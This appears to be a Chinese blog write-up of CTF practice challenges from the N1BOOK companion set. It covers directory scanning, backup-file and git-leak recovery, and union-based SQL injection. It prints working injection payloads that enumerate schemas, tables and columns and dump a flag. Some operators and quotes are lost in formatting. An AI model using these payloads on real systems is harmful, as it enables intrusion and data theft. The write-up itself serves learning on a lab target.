《从0到1:CTFer成长之路》书籍配套题目(不定时更)

📅 2026/8/27 12:26:39
《从0到1:CTFer成长之路》书籍配套题目(不定时更)
N1BOOK常见的搜集粗心的小李SQL注入-1找注入点字段数获取数据库名获取数据表名获取数据列名值[第一章 web入门]SQL注入常见的搜集信息搜集大部分是工具的使用git泄露可能涉及git命令的应用书的前半部分我看不懂只有理论浅总结一下敏感备份文件gedit备份文件vim备份文件常规文件放出提示使用dirbuster工具进行网页目录扫描⼯具是kali⾃带cd /usr/share/dirbuster java -jar DirBuster-1.0-RC1.jar用URL Fuzz可以指定目录指定扫描admin目录下面的所有文件dir代表字典的每一行/admin/{dir}.php 这样就是爆破admin目录下所有php文件或者或者是 dirsearch 教程额环境也查了没扫出来尝试自己直接做/robots.txt得到提示访问可得flag1:n1book{info_1/index.php~得到提示访问可得flag2:s_v3ry_im.index.php.swp会得到一个文件这题看了wp,软件还是没整明白过几天再试试。粗心的小李Git测试使用GitHack脚本对其进行测试教程kali有自带的Git、Python2和Python3。转战虚拟机…主要我下半天GitHack一直失败找到原因了解决不了四处查找资料发现还有一个工具scrabble可以代替它教程链接在文件夹中打开终端./scrabble 网址ls查看cat 文件1.git回滚当题目存在git泄露时flag敏感文件可能在修改中被删除或被覆盖了这时我们可以利用git的“git reset”命令来恢复到以前的版本更简单的方式是通过“git log-stat”命令查看每个commit修改了哪些文件再用“git diff HEAD commit-id”比较在当前版本与想查看的commit之间的变化。2.git分支每次提交时git都会自动把它们串成一条时间线这条时间线就是一个分支git中默认为master分支。要找的flag或敏感文件可能不会藏在当前分支中。需要切换分支来找到想要的文件。建议工具GitHacke3. 泄露的git中也可能有其他有用的信息如.git/config文件夹中可能含有access_token信息SQL注入-1逃不掉的sql题…要总结了一个暑假的sql要开学了先看看书中是怎么讲的由于使用的都是get传入所以MySQL中查询和布尔盲注都不再学习。通过HTTP的GET方式输入的id值PHP将GET方法传入的id1与前面的SQL查询语句进行了拼接找注入点数字型注入字符型注入在MySQL中等号两边如果类型不一致则会发生强制转换。当数字与字符串数据比较时字符串将被转换为数字再进行比较。按照这个特性我们容易判断输入点是否为字符型也就是是否有引号可能是单引号也可能是双引号绝大多数情况下是单引号包裹。另外URL编码中空格的编码是“%20”“”的编码是“%23”。?id1’ and 12页面报错说明存在注入点字段数id1 order by 4 --利用union select 联合查询?id0union select 1,2,3 --这里使用博客原先使用的快法在摆一个博客获取数据库名id0 union select 1,2,group_concat(schema_name) from (information_schema.schemata) --库名可以一步到位当前数据库名id0 union select 1,database(),3 --获取数据表名id0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schemadatabase()--获取数据列名id0 union select 1,2,group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_namefl4g--值id0 union select 1,2,group_concat(fllllag) from (fl4g)--[第一章 web入门]SQL注入首先由题目提示可得请访问 /login.php /user.php试着依次访问这两个文件查看源代码可得提示本文内容仅为个人经验分享仅供参考不构成专业建议。本人不对内容准确性做保证读者据此操作产生的风险自行承担。文中第三方素材版权归原作者如有侵权请联系删除。